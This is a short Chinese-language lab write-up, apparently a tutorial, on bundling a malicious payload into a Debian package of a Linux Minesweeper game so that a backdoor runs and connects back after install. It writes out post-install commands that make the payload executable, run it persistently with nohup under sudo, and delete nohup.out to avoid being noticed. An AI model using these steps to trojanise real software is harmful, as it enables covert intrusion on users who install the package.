一、实验环境
攻击机:kali IP:192.168.100.127
靶机:Ubuntu IP:192.168.100.135
环境:一个Linux版的扫雷小游戏
目的:将恶意程序和小游戏进行捆绑,发送到靶机并触发后门
二、环境准备
查看小程序包含内容,其中,postinst表示安装完要执行的,postrm安装完要删除处理的
将小程序解压到free文件夹中
三、生成恶意程序
四、创建软件包信息
创建一个叫DEBIAN的软件包信息文件夹(必须是大写这个是固定的)
创建软件包的信息文件(释放处文件格式)
五、安装完成后自动调用执行
sudo chmod +x /usr/games/freesweep_sources:安装完成后会给程序加上执行权限
sudo nohup /usr/games/freesweep_sources &:系统后台不挂断,防止注销或退出shell时命令终止
sudo rm -rf /nohup.out:因为执行了上一条命令会生成nohup.out文件,防止被发现得删除
添加执行权限
六、传输软件包
重新构建软件包
将软件包传给目标机(这里因为是做实验,因此直接进行了上传)
七、开启监听
八、建立连接
关闭终端后连接依然继续